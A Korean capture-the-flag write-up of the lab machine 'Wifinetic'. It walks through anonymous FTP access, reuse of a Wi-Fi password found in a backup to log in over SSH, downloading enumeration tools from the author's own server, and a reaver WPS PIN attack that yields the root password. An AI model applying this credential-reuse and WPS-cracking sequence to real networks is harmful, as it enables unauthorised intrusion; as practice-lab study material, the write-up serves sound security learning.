💡 INFO
- IP : 10.10.11.247
- MY : 10.10.14.5
🔎 Foothold
- PortScan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-05 09:32 KST
NSOCK ERROR [0.0670s] ssl_init_helper(): OpenSSL legacy provider failed to load.
Nmap scan report for 10.10.11.247
Host is up (0.23s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.14.5
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 4434 Jul 31 11:03 MigrateOpenWrt.txt
| -rw-r--r-- 1 ftp ftp 2501210 Jul 31 11:03 ProjectGreatMigration.pdf
| -rw-r--r-- 1 ftp ftp 60857 Jul 31 11:03 ProjectOpenWRT.pdf
| -rw-r--r-- 1 ftp ftp 40960 Sep 11 15:25 backup-OpenWrt-2023-07-26.tar
|_-rw-r--r-- 1 ftp ftp 52946 Jul 31 11:03 employees_wellness.pdf
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
| 256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_ 256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
53/tcp open tcpwrapped
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.94 seconds💣 Attack
포트 스캔 결과, 웹은 없고 ftp가 열려 있음. Anonymous의 로그인 또한 허용되어 있는 상태임.
> lftp 10.10.11.247
lftp 10.10.11.247:~> ls
-rw-r--r-- 1 ftp ftp 4434 Jul 31 11:03 MigrateOpenWrt.txt
-rw-r--r-- 1 ftp ftp 2501210 Jul 31 11:03 ProjectGreatMigration.pdf
-rw-r--r-- 1 ftp ftp 60857 Jul 31 11:03 ProjectOpenWRT.pdf
-rw-r--r-- 1 ftp ftp 40960 Sep 11 15:25 backup-OpenWrt-2023-07-26.tar
-rw-r--r-- 1 ftp ftp 52946 Jul 31 11:03 employees_wellness.pdfpdf나 txt문서는 별게 없는 거 같고, tar파일을 분석해봄. 시스템 파일이 있음.
total 104
drwxr-xr-x 19 sangsoon.park staff 608 10 5 09:56 .
drwxr-xr-x 10 sangsoon.park staff 320 10 5 09:56 ..
-rw-r--r--@ 1 sangsoon.park staff 6148 10 5 09:56 .DS_Store
drwxr-xr-x 12 sangsoon.park staff 384 9 12 00:22 config
drwxr-xr-x 4 sangsoon.park staff 128 9 12 00:22 dropbear
-rw-r--r-- 1 sangsoon.park staff 227 7 26 19:08 group
-rw-r--r-- 1 sangsoon.park staff 110 4 28 05:28 hosts
-rw-r--r-- 1 sangsoon.park staff 183 4 28 05:28 inittab
drwxr-xr-x 3 sangsoon.park staff 96 9 12 00:22 luci-uploads
drwxr-xr-x 4 sangsoon.park staff 128 9 12 00:22 nftables.d
drwxr-xr-x 3 sangsoon.park staff 96 9 12 00:22 opkg
-rw-r--r-- 1 sangsoon.park staff 420 7 26 19:09 passwd
-rw-r--r-- 1 sangsoon.park staff 1046 4 28 05:28 profile
-rw-r--r-- 1 sangsoon.park staff 132 4 28 05:28 rc.local
-rw-r--r-- 1 sangsoon.park staff 9 4 28 05:28 shells
-rw-r--r-- 1 sangsoon.park staff 475 4 28 05:28 shinit
-rw-r--r-- 1 sangsoon.park staff 80 4 28 05:28 sysctl.conf
-rw-r--r-- 1 sangsoon.park staff 745 7 25 04:15 uhttpd.crt
-rw-r--r-- 1 sangsoon.park staff 121 7 25 04:15 uhttpd.keypasswd를 보면 사용자는 netadmin으로 보임. 서버에 22포트가 열려 있으므로 뭔가 해당 계정으로 서버를 들어가야할 것으로 보임.
root:x:0:0:root:/root:/bin/ash
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
ntp:x:123:123:ntp:/var/run/ntp:/bin/false
dnsmasq:x:453:453:dnsmasq:/var/run/dnsmasq:/bin/false
logd:x:514:514:logd:/var/run/logd:/bin/false
ubus:x:81:81:ubus:/var/run/ubus:/bin/false
netadmin:x:999:999::/home/netadmin:/bin/false파일을 둘러보다가,, config 파일 내 wireless를 보면 key값이 존재함. 이게 패스워드 일까?
cat wireless
config wifi-device 'radio0'
option type 'mac80211'
option path 'virtual/mac80211_hwsim/hwsim0'
option cell_density '0'
option channel 'auto'
option band '2g'
option txpower '20'
config wifi-device 'radio1'
option type 'mac80211'
option path 'virtual/mac80211_hwsim/hwsim1'
option channel '36'
option band '5g'
option htmode 'HE80'
option cell_density '0'
config wifi-iface 'wifinet0'
option device 'radio0'
option mode 'ap'
option ssid 'OpenWrt'
option encryption 'psk'
option key 'VeRyUniUqWiFIPasswrd1!'
option wps_pushbutton '1'
config wifi-iface 'wifinet1'
option device 'radio1'
option mode 'sta'
option network 'wwan'
option ssid 'OpenWrt'
option encryption 'psk'
option key 'VeRyUniUqWiFIPasswrd1!'ssh를 통해 접근해보면.. 맞았다.
ssh netadmin@10.10.11.247
The authenticity of host '10.10.11.247 (10.10.11.247)' can't be established.
ED25519 key fingerprint is SHA256:RoZ8jwEnGGByxNt04+A/cdluslAwhmiWqG3ebyZko+A.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.247' (ED25519) to the list of known hosts.
netadmin@10.10.11.247's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-162-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu 05 Oct 2023 01:01:22 AM UTC
System load: 0.0
Usage of /: 64.2% of 4.76GB
Memory usage: 6%
Swap usage: 0%
Processes: 227
Users logged in: 0
IPv4 address for eth0: 10.10.11.247
IPv6 address for eth0: dead:beef::250:56ff:feb9:8732
IPv4 address for wlan0: 192.168.1.1
IPv4 address for wlan1: 192.168.1.23
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.
https://ubuntu.com/engage/secure-kubernetes-at-the-edge
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Tue Sep 12 12:46:00 2023 from 10.10.14.23
netadmin@wifinetic:~$ id
uid=1000(netadmin) gid=1000(netadmin) groups=1000(netadmin)
netadmin@wifinetic:~$쉬움문제라 5분도 안걸렸다..
👑 Privilege
sudo 권한은 확인해봤는데 별게 없었음. 이에 linpeas, pspy64, find 등을 수행해보자.
내 PC > python3 -m http.server
서버에 다운로드
netadmin@wifinetic:~$ wget 10.10.14.5:8000/pspy64
--2023-10-05 01:08:57-- http://10.10.14.5:8000/pspy64
Connecting to 10.10.14.5:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’
pspy64 100%[===================================================================================================================================================================================================>] 2.96M 1.15MB/s in 2.6s
2023-10-05 01:09:00 (1.15 MB/s) - ‘pspy64’ saved [3104768/3104768]
netadmin@wifinetic:~$ wget 10.10.14.5:8000/linpeas.sh
--2023-10-05 01:09:05-- http://10.10.14.5:8000/linpeas.sh
Connecting to 10.10.14.5:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 765826 (748K) [application/x-sh]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[===================================================================================================================================================================================================>] 747.88K 556KB/s in 1.3s
2023-10-05 01:09:07 (556 KB/s) - ‘linpeas.sh’ saved [765826/765826]find / -perm 4000 2>/dev/null : 특이사항 없음.
linpeas.sh : 별다른 특이사항 없음.
pspy : root권한의 수상한 행동(/bin/bash /usr/local/bin/wps_check.sh)
2023/10/05 01:41:14 CMD: UID=0 PID=21705 | /usr/bin/systemctl restart wpa_supplicant.service
2023/10/05 01:41:14 CMD: UID=0 PID=21706 | /sbin/wpa_supplicant -u -s -c /etc/wpa_supplicant.conf -i wlan1
2023/10/05 01:41:14 CMD: UID=0 PID=21716 | /lib/systemd/systemd-udevd
2023/10/05 01:41:14 CMD: UID=0 PID=21715 | /lib/systemd/systemd-udevd
2023/10/05 01:41:14 CMD: UID=0 PID=21714 | /lib/systemd/systemd-udevd
2023/10/05 01:41:14 CMD: UID=0 PID=21713 | /lib/systemd/systemd-udevd
2023/10/05 01:41:14 CMD: UID=0 PID=21712 | /lib/systemd/systemd-udevd
2023/10/05 01:41:14 CMD: UID=0 PID=21711 | /lib/systemd/systemd-udevd
2023/10/05 01:41:14 CMD: UID=0 PID=21710 | /lib/systemd/systemd-udevd
2023/10/05 01:41:14 CMD: UID=0 PID=21709 | /lib/systemd/systemd-udevd
2023/10/05 01:41:14 CMD: UID=0 PID=21708 | /lib/systemd/systemd-udevd
2023/10/05 01:41:14 CMD: UID=0 PID=21707 | /lib/systemd/systemd-udevd
2023/10/05 01:41:14 CMD: UID=0 PID=21718 | /bin/bash /usr/local/bin/wps_check.sh
2023/10/05 01:41:14 CMD: UID=0 PID=21719 | /bin/bash /usr/local/bin/wps_check.sh
2023/10/05 01:41:14 CMD: UID=0 PID=21720 | sleep 5시스템 적으로 봤는데 나올게 없음. conf파일을 보려해도 권한이 없어서 볼수가 없음.
프로세스는 계속 wifi관련 프로세스가 올라와서 네트워크 정보를 확인
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.11.247 netmask 255.255.254.0 broadcast 10.10.11.255
inet6 dead:beef::250:56ff:feb9:8732 prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb9:8732 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b9:87:32 txqueuelen 1000 (Ethernet)
RX packets 11539 bytes 4761182 (4.7 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 9096 bytes 4399254 (4.3 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 10423 bytes 625648 (625.6 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 10423 bytes 625648 (625.6 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
mon0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
unspec 02-00-00-00-02-00-30-3A-00-00-00-00-00-00-00-00 txqueuelen 1000 (UNSPEC)
RX packets 45723 bytes 8049722 (8.0 MB)
RX errors 0 dropped 45723 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.1 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::ff:fe00:0 prefixlen 64 scopeid 0x20<link>
ether 02:00:00:00:00:00 txqueuelen 1000 (Ethernet)
RX packets 1530 bytes 144584 (144.5 KB)
RX errors 0 dropped 209 overruns 0 frame 0
TX packets 1796 bytes 208450 (208.4 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.23 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::ff:fe00:100 prefixlen 64 scopeid 0x20<link>
ether 02:00:00:00:01:00 txqueuelen 1000 (Ethernet)
RX packets 462 bytes 63550 (63.5 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1530 bytes 172124 (172.1 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan2: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
ether 02:00:00:00:02:00 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions > iwconfig
wlan0 IEEE 802.11 Mode:Master Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
lo no wireless extensions.
mon0 IEEE 802.11 Mode:Monitor Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
wlan2 IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
eth0 no wireless extensions.
wlan1 IEEE 802.11 ESSID:"OpenWrt"
Mode:Managed Frequency:2.412 GHz Access Point: 02:00:00:00:00:00
Bit Rate:24 Mb/s Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
Link Quality=70/70 Signal level=-30 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:8 Missed beacon:0
hwsim0 no wireless extensions.보면 mon0 모니터모드가 되어 있음. 이에 모니터모드를 활용해서 wps 크랙을 해야하는데 sudo를 쓸수가 없음.. 좌절하고 있는데 서버 내 특정 툴이 존재했음.
netadmin@wifinetic:~$ reaver
Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
Required Arguments:
-i, --interface=<wlan> Name of the monitor-mode interface to use
-b, --bssid=<mac> BSSID of the target AP
Optional Arguments:
-m, --mac=<mac> MAC of the host system
-e, --essid=<ssid> ESSID of the target AP
-c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)
-s, --session=<file> Restore a previous session file
-C, --exec=<command> Execute the supplied command upon successful pin recovery
-f, --fixed Disable channel hopping
-5, --5ghz Use 5GHz 802.11 channels
-v, --verbose Display non-critical warnings (-vv or -vvv for more)
-q, --quiet Only display critical messages
-h, --help Show help
Advanced Options:
-p, --pin=<wps pin> Use the specified pin (may be arbitrary string or 4/8 digit WPS pin)
-d, --delay=<seconds> Set the delay between pin attempts [1]
-l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
-g, --max-attempts=<num> Quit after num pin attempts
-x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
-r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts
-t, --timeout=<seconds> Set the receive timeout period [10]
-T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.40]
-A, --no-associate Do not associate with the AP (association must be done by another application)
-N, --no-nacks Do not send NACK messages when out of order packets are received
-S, --dh-small Use small DH keys to improve crack speed
-L, --ignore-locks Ignore locked state reported by the target AP
-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
-J, --timeout-is-nack Treat timeout as NACK (DIR-300/320)
-F, --ignore-fcs Ignore frame checksum errors
-w, --win7 Mimic a Windows 7 registrar [False]
-K, --pixie-dust Run pixiedust attack
-Z Run pixiedust attack
Example:
reaver -i wlan0mon -b 00:90:4C:C1:AC:21 -vv이것을 활용해서 크랙을 시도해보니, PSK가 나옴 root 패스워드 일듯?
netadmin@wifinetic:~$ reaver -i mon0 -b 02:00:00:00:00:00 -vv
Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from 02:00:00:00:00:00
[+] Switching mon0 to channel 1
[+] Received beacon from 02:00:00:00:00:00
[+] Trying pin "12345670"
[+] Sending authentication request
[!] Found packet with bad FCS, skipping...
[+] Sending association request
[+] Associated with 02:00:00:00:00:00 (ESSID: OpenWrt)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 2 seconds
[+] WPS PIN: '12345670'
[+] WPA PSK: 'WhatIsRealAnDWhAtIsNot51121!'
[+] AP SSID: 'OpenWrt'
[+] Nothing done, nothing to save.풀긴했으나, 권한상승은 억지가 있지 않았나하면서 좀 아쉬웠음.
netadmin@wifinetic:~$ su root
Password:
root@wifinetic:/home/netadmin# cd ~
root@wifinetic:~# ls
root.txt snap
root@wifinetic:~# cat root.txt
그냥 끄적임..